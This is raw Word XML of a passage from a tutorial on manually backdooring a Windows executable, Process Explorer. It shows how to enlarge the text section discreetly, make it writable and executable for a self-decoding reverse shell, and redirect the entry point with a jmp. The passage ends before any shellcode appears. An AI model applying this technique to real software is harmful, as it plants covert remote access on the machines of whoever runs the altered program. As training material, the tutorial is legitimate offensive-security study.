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71F668" w14:textId="77777777" w:rsidR="00B2460B" w:rsidRPr="00CE241A" w:rsidRDefault="00427035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>Manual Backdooring EXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D06C9B9" w14:textId="77777777" w:rsidR="00427035" w:rsidRPr="00CE241A" w:rsidRDefault="00427035">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1875A529" w14:textId="2BD75649" w:rsidR="00427035" w:rsidRPr="00CE241A" w:rsidRDefault="00427035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The victim application here will be my favorite processExplorer from </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Sysintel suit.  </w:t>
      </w:r>
      <w:r w:rsidR="00C25A7E" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Tools will be CFF explorer</w:t>
      </w:r>
      <w:r w:rsidR="00EE0778" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, hexeditor</w:t>
      </w:r>
      <w:r w:rsidR="00C5655F" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Olly.  G</w:t>
      </w:r>
      <w:r w:rsidR="00C25A7E" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>eneral</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> process is as follow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DDF65" w14:textId="4B749D3C" w:rsidR="00427035" w:rsidRPr="00CE241A" w:rsidRDefault="00D62995" w:rsidP="00427035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Find </w:t>
      </w:r>
      <w:r w:rsidR="00224A99" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>an area to place the shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A802D29" w14:textId="63531850" w:rsidR="00427035" w:rsidRPr="00CE241A" w:rsidRDefault="00D62995" w:rsidP="00427035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CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Hijack program execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF244BE" w14:textId="436C3D90" w:rsidR="00C25A7E" w:rsidRPr="009D6307" w:rsidRDefault="00427035" w:rsidP="009D6307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Return execution back to host process    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B58164D" w14:textId="77777777" w:rsidR="00A245B5" w:rsidRPr="00CE241A" w:rsidRDefault="00A245B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A84501C" w14:textId="03C9D818" w:rsidR="00D62995" w:rsidRPr="00CE241A" w:rsidRDefault="00BE1B4F" w:rsidP="00D62995">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D4F89FF" wp14:editId="02A80B65">
            <wp:extent cx="5486400" cy="4104005"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:docPr id="3" name="Picture 3" descr="MyShit:Users:mee:Desktop:img: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hit:Users:mee:Desktop:img:1.tif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D7B0D" w14:textId="77777777" w:rsidR="00D62995" w:rsidRPr="00CE241A" w:rsidRDefault="00D62995" w:rsidP="00D62995">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61959294" w14:textId="4DFAEDF9" w:rsidR="00D62995" w:rsidRPr="00CE241A" w:rsidRDefault="00D62995" w:rsidP="00D62995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Find an area to </w:t>
      </w:r>
      <w:r w:rsidR="008247BE" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>place the shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24977165" w14:textId="77777777" w:rsidR="0046599F" w:rsidRPr="00CE241A" w:rsidRDefault="0046599F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6217D20B" w14:textId="569E9E53" w:rsidR="00FC7386" w:rsidRPr="00CE241A" w:rsidRDefault="00A245B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>So the EXE has 5 section</w:t>
      </w:r>
      <w:r w:rsidR="0046599F" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F91A91" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a </w:t>
      </w:r>
      <w:r w:rsidR="001C3CA9" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>text section</w:t>
      </w:r>
      <w:r w:rsidR="00E571E5" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> starting at RVA 0x1000 - </w:t>
      </w:r>
      <w:r w:rsidR="00F91A91" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>0xad</w:t>
      </w:r>
      <w:r w:rsidR="00E571E5" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>b06, and 0x400 – 0xae000</w:t>
      </w:r>
      <w:r w:rsidR="001C3CA9" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>.  Section flags look normal as expected from a normal EXE.</w:t>
      </w:r>
      <w:r w:rsidR="00BE1B4F" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">  The code in this section shows no caves, but a small roughly 250 bytes of free space at the end.  Since I’m doing a bind shell, this sp</w:t>
      </w:r>
      <w:r w:rsidR="00A53B3E" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>ace is not sufficient because I</w:t>
      </w:r>
      <w:r w:rsidR="00BE1B4F" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>’ll need at least ~340 bytes.</w:t>
      </w:r>
      <w:r w:rsidR="00440F49" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">  There are a couple ways around this with one slapping another text section to the end of the EXE.  I personally dislike this option because it</w:t>
      </w:r>
      <w:r w:rsidR="00FC7386" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00440F49" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">s ugly and looks obvious, so I’m going to go with adjusting the section headers instead.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F34D6CD" w14:textId="63173253" w:rsidR="00A245B5" w:rsidRPr="00CE241A" w:rsidRDefault="00E571E5" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2CAF65" w14:textId="74EDE2D0" w:rsidR="00873CAC" w:rsidRPr="00CE241A" w:rsidRDefault="005910A8" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:noProof/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FDFC2DD" wp14:editId="1ED1E293">
            <wp:extent cx="5486400" cy="4104005"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:docPr id="5" name="Picture 5" descr="MyShit:Users:mee:Desktop:img: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hit:Users:mee:Desktop:img:2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E1E8" w14:textId="77777777" w:rsidR="00063CA1" w:rsidRPr="00CE241A" w:rsidRDefault="00063CA1" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38ADBF41" w14:textId="642D11FD" w:rsidR="001258AC" w:rsidRPr="00CE241A" w:rsidRDefault="00873CAC" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>So I’ve done a couple of modifications.  Add</w:t>
      </w:r>
      <w:r w:rsidR="00053D3A" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x200 </w:t>
      </w:r>
      <w:r w:rsidR="00812E18" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00812E18" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>text section raw size,</w:t>
      </w:r>
      <w:r w:rsidR="00812E18" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00E93E89" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x200 bytes to</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve"> rdata, data, rsrc, and reloc section raw addresses.  </w:t>
      </w:r>
      <w:r w:rsidR="005910A8" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the EXE with a hexeditor and add 0x200 NULL bytes between the text and rdata section.  </w:t>
      </w:r>
      <w:r w:rsidR="00063CA1" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">All of this is done to add another 512 bytes of space for the shellcode, and adjust section boundaries to reflect the new size.  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">In addition, </w:t>
      </w:r>
      <w:r w:rsidR="00063CA1" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">I also </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>set text section flags to R/W/X</w:t>
      </w:r>
      <w:r w:rsidR="00063CA1" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve"> because I plan to have a </w:t>
      </w:r>
      <w:r w:rsidR="00E93E89" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>self-decoding</w:t>
      </w:r>
      <w:r w:rsidR="000362B7" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve"> reverse </w:t>
      </w:r>
      <w:r w:rsidR="00063CA1" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>shell.</w:t>
      </w:r>
      <w:r w:rsidR="00A97920" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">  Now the EXE is read</w:t>
      </w:r>
      <w:r w:rsidR="00CE7C8C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>y to be backdoor</w:t>
      </w:r>
      <w:r w:rsidR="001258AC" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021DB73A" w14:textId="77777777" w:rsidR="00F96F59" w:rsidRPr="00CE241A" w:rsidRDefault="00F96F59" w:rsidP="00F96F59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AC20AC" w14:textId="50A2F4C3" w:rsidR="002F65A6" w:rsidRPr="00CE241A" w:rsidRDefault="005467C0" w:rsidP="00F96F59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:noProof/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EE728CD" wp14:editId="4D084098">
            <wp:extent cx="5486400" cy="4104005"/>
            <wp:effectExtent l="0" t="0" r="0" b="10795"/>
            <wp:docPr id="2" name="Picture 2" descr="MyShit:Users:mee:Desktop:img:3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hit:Users:mee:Desktop:img:3.tif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AD362" w14:textId="77777777" w:rsidR="00870AE2" w:rsidRPr="00CE241A" w:rsidRDefault="00870AE2" w:rsidP="00F96F59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3D8216" w14:textId="2B91595B" w:rsidR="0001707B" w:rsidRPr="00CE241A" w:rsidRDefault="0001707B" w:rsidP="00F96F59">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Hijack program execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E5EF8" w14:textId="77777777" w:rsidR="002F65A6" w:rsidRPr="00CE241A" w:rsidRDefault="002F65A6" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143E2CEF" w14:textId="4777730D" w:rsidR="002F65A6" w:rsidRPr="00CE241A" w:rsidRDefault="002F65A6" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>Start Olly and cop</w:t>
      </w:r>
      <w:r w:rsidR="00870AE2" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>y the first few instructions fro</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t>m the entry point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA7827" w14:textId="77777777" w:rsidR="002F65A6" w:rsidRPr="00CE241A" w:rsidRDefault="002F65A6" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25A4CB44" w14:textId="77777777" w:rsidR="006000D9" w:rsidRDefault="005E4E00" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4E00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">01405108 &gt; $  E8 02AE0000   CALL procexp-.0140FF0F
</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC013E5" w14:textId="3E16C01A" w:rsidR="0079114E" w:rsidRDefault="005E4E00" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E4E00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
        <w:t xml:space="preserve">0140510D   .^ E9 7FFEFFFF   JMP procexp-.01404F91
</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D486F8" w14:textId="77777777" w:rsidR="006000D9" w:rsidRPr="00CE241A" w:rsidRDefault="006000D9" w:rsidP="00C43034">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cs="Courier"/>
          <w:color w:val="3B2322"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26AC89E2" w14:textId="398794E7" w:rsidR="001B3F62" w:rsidRPr="00CE241A" w:rsidRDefault="001B3F62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Find the space we allocated </w:t>
      </w:r>
      <w:r w:rsidR="00FD1C38" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>earlier</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the shellcode at the end of the text section.</w:t>
      </w:r>
      <w:r w:rsidR="0079114E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  In my case I choose 0x</w:t>
      </w:r>
      <w:r w:rsidR="006000D9" w:rsidRPr="005E4E00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">0141EB0A </w:t>
      </w:r>
      <w:r w:rsidR="00150BD4" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the start of my shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00FD1C38" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00150BD4" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Hijack the execution by replacing</w:t>
      </w:r>
      <w:r w:rsidR="00FD1C38" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the first </w:t>
      </w:r>
      <w:r w:rsidR="0079114E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">instructions with jmp </w:t>
      </w:r>
      <w:r w:rsidR="006000D9" w:rsidRPr="005E4E00">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>0141EB0A</w:t>
      </w:r>
      <w:r w:rsidR="00FD1C38" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>, and step into, to jump over to w</w:t>
      </w:r>
      <w:r w:rsidR="00150BD4" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>here we’ll work on the shellcode</w:t>
      </w:r>
      <w:r w:rsidR="00FD1C38" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00565D8C" w:rsidRPr="00CE241A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">  Slowly assemble all of the follow assembly code to that address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB2A76E" w14:textId="77777777" w:rsidR="005E4E00" w:rsidRPr="00CE241A" w:rsidRDefault="005E4E00" w:rsidP="001258AC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
